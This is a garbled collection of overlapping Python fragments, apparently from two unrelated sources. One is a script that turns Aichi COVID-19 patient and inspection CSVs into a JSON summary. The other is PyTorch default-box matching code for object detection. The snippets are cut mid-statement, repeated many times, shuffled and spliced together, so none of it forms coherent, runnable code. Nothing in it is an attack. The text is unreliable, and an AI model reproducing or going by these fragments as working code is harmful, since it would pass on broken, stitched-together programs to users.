datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num", "= patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False)", "in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算']", "# 引数を取得 異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\")", "patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意 args = sys.argv with", "0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1]", "'%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days", "date, time, timedelta # Japan Standard Time (UTC + 09:00)", "foundZero = True for date in reversed(datelist): if (not (date.strftime('%Y-%m-%d')", "sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile)", "reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] })", "= sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader =", "else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\":", "in range(days_num): datelist.append(strdt + timedelta(days = i)) patients_summary_list = []", "{ \"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\" : { \"date\":", "datetime, date, time, timedelta # Japan Standard Time (UTC +", "'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for row in", "{ \"date\": JST_current_time, \"data\": inspections_summary_list }, 
\"main_summary_history\": { \"date\": JST_current_time,", "= False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] })", "検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile:", "# 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days + 1 datelist", "patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv',", "data = { \"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\":", "inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data", "\"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8') print(json.dumps(data,", "pd import sys from dateutil import tz from datetime import", "# 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています)", "= [] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True for", "\"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え", "strdt).days + 1 datelist = [] for i in range(days_num):", "}) data = { \"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time,", "from datetime import datetime, date, time, timedelta # Japan Standard", "= [] patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意 args =", "でない日から開始する foundZero = True for date in reversed(datelist): if (not", "\"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換", "# 日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True for date in", "sys from dateutil import tz from datetime import datetime, date,", "0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d')", "for date in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and", "\"合算\": row['合算'] }) data = { \"lastUpdate\": JST_current_time, \"patients\": {", "\"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" : { \"date\": JST_current_time,", "in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成", "as pd import sys from dateutil import tz from datetime", "(not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue else: foundZero =", "= datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic = {} #", "if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue else: foundZero", "datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic = {} # 引数を取得", "異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile:", "in patients_summary_dic)) and foundZero: continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'),", "}, \"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', 
force_ascii=False)) } }", "# 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み", "1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt", "0 でない日から開始する foundZero = True for date in reversed(datelist): if", "io import json import pandas as pd import sys from", "i)) patients_summary_list = [] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero =", "import pandas as pd import sys from dateutil import tz", "patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list =", "+= 1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日", "csvfile: reader = csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({ \"日付\":", "\"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data = { \"lastUpdate\": JST_current_time,", "JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic = {}", "for row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']),", "\"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\"", "+ timedelta(days = i)) patients_summary_list = [] # 日付の新しい順に辿って小計が 0", "Japan Standard Time (UTC + 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time", "days_num = (enddt - strdt).days + 1 datelist = []", "patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\",", "date in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero:", "日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1],", "{} # 引数を取得 異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv', 'r',", "reader = csv.DictReader(csvfile) for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0)", "with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for", "{ \"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" : { \"date\":", "= (enddt - strdt).days + 1 datelist = [] for", "= i)) patients_summary_list = [] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero", "日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days + 1 datelist =", "'%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data = { \"lastUpdate\":", "json import pandas as pd import sys from dateutil import", "patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt =", "inspections_summary_list = [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader", "patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') #", "with open('data/patients.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for", "main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list = []", "[] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: 
reader = csv.DictReader(csvfile)", "}, \"inspections_summary\" : { \"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\":", "json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8') print(json.dumps(data, indent=4,", "open('data/inspections_summary.csv', 'r', encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for row", "(enddt - strdt).days + 1 datelist = [] for i", "JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')", "pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv', 'r',", "JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records',", "import csv import io import json import pandas as pd", "import datetime, date, time, timedelta # Japan Standard Time (UTC", "row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 #", "from dateutil import tz from datetime import datetime, date, time,", "[] for i in range(days_num): datelist.append(strdt + timedelta(days = i))", "JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = []", "(date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue else: foundZero = False", "for i in range(days_num): datelist.append(strdt + timedelta(days = i)) patients_summary_list", "日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list", "tz from datetime import datetime, date, time, timedelta # Japan", "終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days + 1", "(UTC + 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M')", "range(days_num): datelist.append(strdt + timedelta(days = i)) patients_summary_list = [] #", "\"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data =", "time, timedelta # Japan Standard Time (UTC + 09:00) JST", "\"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time, \"data\":", "[] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True for date", "import io import json import pandas as pd import sys", "dateutil import tz from datetime import datetime, date, time, timedelta", "strdt = datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d')", "patients_summary_list = [] # 日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True", "+ 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list", "pandas as pd import sys from dateutil import tz from", "# Japan Standard Time (UTC + 09:00) JST = tz.gettz('Asia/Tokyo')", "datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\": row['合算'] }) data = {", "csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\":", 
"csvfile: reader = csv.DictReader(csvfile) for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'],", "= datetime.strptime(\"2020-01-26\", '%Y-%m-%d') # 開始日 enddt = datetime.strptime(args[1], '%Y-%m-%d') #", "True for date in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic))", "date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え #", "\"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\" : { \"date\": JST_current_time,", "<reponame>sungpyocho/covid19-aichi-tools import csv import io import json import pandas as", "encoding=\"utf-8\") as csvfile: reader = csv.DictReader(csvfile) for row in reader:", ": { \"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" : {", "csv import io import json import pandas as pd import", "\"inspections_summary\" : { \"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": {", "timedelta(days = i)) patients_summary_list = [] # 日付の新しい順に辿って小計が 0 でない日から開始する", "csv.DictReader(csvfile) for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] +=", "for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1", "}) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df =", "datetime import datetime, date, time, timedelta # Japan Standard Time", "\"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer,", "# 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt - strdt).days +", "}, \"patients_summary\" : { \"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\"", "\"data\": patients_summary_list }, \"inspections_summary\" : { \"date\": JST_current_time, \"data\": inspections_summary_list", "enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num =", "row['合算'] }) data = { \"lastUpdate\": JST_current_time, \"patients\": { \"date\":", "= datetime.strptime(args[1], '%Y-%m-%d') # 終了日 # 日付差の日数を算出(リストに最終日も含めたいので、+1しています) days_num = (enddt", "patients_summary_dic)) and foundZero: continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0)", "tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic =", "\"patients_summary\" : { \"date\": JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" :", "force_ascii=False)) } } sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8') print(json.dumps(data, indent=4, ensure_ascii=False))", "JST_current_time, \"data\": patients_list }, \"patients_summary\" : { \"date\": JST_current_time, \"data\":", "JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\" :", ": { \"date\": JST_current_time, \"data\": inspections_summary_list }, \"main_summary_history\": { \"date\":", "timedelta # Japan Standard Time (UTC + 09:00) JST =", "= { \"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\": patients_list", "args = sys.argv with open('data/patients.csv', 'r', 
encoding=\"utf-8\") as csvfile: reader", "row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'), \"小計\": int(row['検査件数(件)']), \"合算\":", "# main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list =", "JST_current_time, \"data\": patients_summary_list }, \"inspections_summary\" : { \"date\": JST_current_time, \"data\":", "[] patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意 args = sys.argv", "patients_list }, \"patients_summary\" : { \"date\": JST_current_time, \"data\": patients_summary_list },", "as csvfile: reader = csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({", "\"data\": patients_list }, \"patients_summary\" : { \"date\": JST_current_time, \"data\": patients_summary_list", "= tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list = [] patients_summary_dic", "- strdt).days + 1 datelist = [] for i in", "import json import pandas as pd import sys from dateutil", "patients_summary_list }, \"inspections_summary\" : { \"date\": JST_current_time, \"data\": inspections_summary_list },", "import tz from datetime import datetime, date, time, timedelta #", "{ \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout =", "import sys from dateutil import tz from datetime import datetime,", "= [] for i in range(days_num): datelist.append(strdt + timedelta(days =", "patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df", "datelist = [] for i in range(days_num): datelist.append(strdt + timedelta(days", "09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M') patients_list =", "Time (UTC + 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d", "i in range(days_num): datelist.append(strdt + timedelta(days = i)) patients_summary_list =", "and foundZero: continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({", "+ 1 datelist = [] for i in range(days_num): datelist.append(strdt", "foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')]", "reader = csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'],", "= pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv',", "reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']] += 1 # 日付のリストを生成 strdt", "{ \"lastUpdate\": JST_current_time, \"patients\": { \"date\": JST_current_time, \"data\": patients_list },", "reversed(datelist): if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero: continue else:", "引数を取得 異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv', 'r', encoding=\"utf-8\") as", "\"data\": inspections_summary_list }, \"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', 
force_ascii=False))", "\"main_summary_history\": { \"date\": JST_current_time, \"data\": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False)) } } sys.stdout", "= {} # 引数を取得 異常系処理はしてないので注意 args = sys.argv with open('data/patients.csv',", "= csv.DictReader(csvfile) for row in reader: patients_list.append(row) patients_summary_dic.setdefault(row['date'], 0) patients_summary_dic[row['date']]", "\"patients\": { \"date\": JST_current_time, \"data\": patients_list }, \"patients_summary\" : {", "patients_list = [] patients_summary_dic = {} # 引数を取得 異常系処理はしてないので注意 args", "Standard Time (UTC + 09:00) JST = tz.gettz('Asia/Tokyo') JST_current_time =", "as csvfile: reader = csv.DictReader(csvfile) for row in reader: patients_list.append(row)", "日付の新しい順に辿って小計が 0 でない日から開始する foundZero = True for date in reversed(datelist):", "= True for date in reversed(datelist): if (not (date.strftime('%Y-%m-%d') in", "patients_summary_list[::-1] # 日付の昇順に並び替え # main_summary_history.csvをPandasのDataframeに変換 main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) #", "False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d'), \"小計\": patients_summary_dic[date.strftime('%Y-%m-%d')] }) patients_summary_list", "main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False) # 検査件数の読み込み inspections_summary_list = [] with", "= csv.DictReader(csvfile) for row in reader: inspections_summary_list.append({ \"日付\": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'),", "keep_default_na=False) # 検査件数の読み込み inspections_summary_list = [] with open('data/inspections_summary.csv', 'r', encoding=\"utf-8\")", "int(row['検査件数(件)']), \"合算\": row['合算'] }) data = { \"lastUpdate\": JST_current_time, \"patients\":", "continue else: foundZero = False patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0) patients_summary_list.append({ \"日付\": date.strftime('%Y-%m-%d')," ]
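The one non-obvious step in the script above is the trailing-zero trim on the per-day subtotals: days newer than the last day with any patients are dropped entirely, while interior gaps are filled with 0. A standalone sketch of that rule follows; `summarize` is a hypothetical helper written for illustration, not a function in the script.

from datetime import datetime, timedelta

def summarize(counts, start, end):
    d0 = datetime.strptime(start, '%Y-%m-%d')
    d1 = datetime.strptime(end, '%Y-%m-%d')
    dates = [d0 + timedelta(days=i) for i in range((d1 - d0).days + 1)]
    out, found = [], False
    for d in reversed(dates):
        key = d.strftime('%Y-%m-%d')
        if key not in counts and not found:
            continue  # still inside the trailing run of empty days
        found = True
        out.append({"日付": key, "小計": counts.get(key, 0)})
    return out[::-1]  # ascending date order

print(summarize({'2020-01-27': 2}, '2020-01-26', '2020-01-29'))
# [{'日付': '2020-01-26', '小計': 0}, {'日付': '2020-01-27', '小計': 2}]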
[ "object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)", "target[:, :4], target[:, 4:12], target[:, 12:] # overlaps' shape =", "enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) #", "means (cx, cy, w, h) :param kwargs: threshold: (Optional) float,", "shape = (batch num, object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1)", "default box is object or background. matched_targets: Tensor, shape =", "dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices = object_indices.long()", "import centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs): \"\"\" :param targets:", "that means (cx, cy, w, h) :param kwargs: threshold: (Optional)", "matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] =", ":4], target[:, 4:12], target[:, 12:] # overlaps' shape = (object", "each default box is object or background. matched_targets: Tensor, shape", "is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default boxes", "enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure", "Tensor, shape = (batch, default box num, 4+class_num) including background", "# overlaps' shape = (object num, default box num) overlaps", "overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices = object_indices.long() # for fancy", "-1] = 1 return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes, **kwargs):", "threshold + 1) # ensure N!=0 pos_ind = overlaps_per_dbox >", "12:] # overlaps' shape = (object num, default box num)", "= object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox > threshold", "matched_targets def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape", "object # shape = (batch num, object num) overlaps_per_object, dbox_indices", "pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4", "torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device)", "Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num,", "import torch from ....data.utils.boxes import centroids2corners, iou def matching_strategy(targets, dboxes,", "or background. 
matched_targets: Tensor, shape = (batch, default box num,", "image' and 'localization=(cx, cy, w, h)' class_num = targets[0].shape[1] -", "4 # convert centered coordinated to minmax coordinates dboxes_mm =", "target in enumerate(targets): targets_loc, targets_quad, targets_conf = target[:, :4], target[:,", "# assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b,", "4:12], matched_targets[b, :, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b]", "cy, w, h) :param kwargs: threshold: (Optional) float, threshold for", "# shape = (batch num, dboxes num) overlaps_per_dbox, object_indices =", "to minmax coordinates dboxes_mm = centroids2corners(dboxes) # create returned empty", "including background \"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num')", "targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background flag", "target in enumerate(targets): targets_loc, targets_conf = target[:, :4], target[:, 4:]", "matched_targets[b, neg_ind, 12:] = 0 matched_targets[b, neg_ind, -1] = 1", "dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device) # matching for", "returned empty Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool),", "best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind]", "targets matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:]", "cy, w, h)' class_num = targets[0].shape[1] - 4 # convert", "Note that means (cx, cy, w, h) :param kwargs: threshold:", "h)' class_num = targets[0].shape[1] - 4 - 8 # convert", "= targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0", "N!=0 pos_ind = overlaps_per_dbox > threshold # assign targets matched_targets[b,", "dbox_indices, threshold + 1) # ensure N!=0 pos_ind = overlaps_per_dbox", "dboxes_mm = centroids2corners(dboxes) # create returned empty Tensor pos_indicator, matched_targets", "4 - 8 # convert centered coordinated to minmax coordinates", "# set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:]", "w, h)' class_num = targets[0].shape[1] - 4 # convert centered", "object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox > threshold pos_indicator[b]", "(batch, default box num). 
this represents whether each default box", "12:] = 0 matched_targets[b, neg_ind, -1] = 1 return pos_indicator,", "minmax coordinates dboxes_mm = centroids2corners(dboxes) # create returned empty Tensor", "= (batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #", "get maximum overlap value for each default box # shape", "= target[:, :4], target[:, 4:] # overlaps' shape = (object", "= torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 +", "coordinated to minmax coordinates dboxes_mm = centroids2corners(dboxes) # create returned", "matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b]", "targets_loc, targets_conf = target[:, :4], target[:, 4:] # overlaps' shape", "obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0 pos_ind =", "num, 4+class_num) including background \"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num", "object_indices = overlaps.max(dim=0) # object_indices = object_indices.long() # for fancy", "torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 + 8", "torch from ....data.utils.boxes import centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs):", "num). this represents whether each default box is object or", ":param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels) :param dboxes:", "maximum overlap values for each object # shape = (batch", "(batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default boxes num,", "targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels) :param dboxes: shape", "obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold", "(Optional) float, threshold for returned indicator batch_num: (Required) int, batch", "= iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox", "get maximum overlap values for each object # shape =", "\"\"\" :param targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param", "represents whether each default box is object or background. matched_targets:", "Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is", "overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox,", "background. 
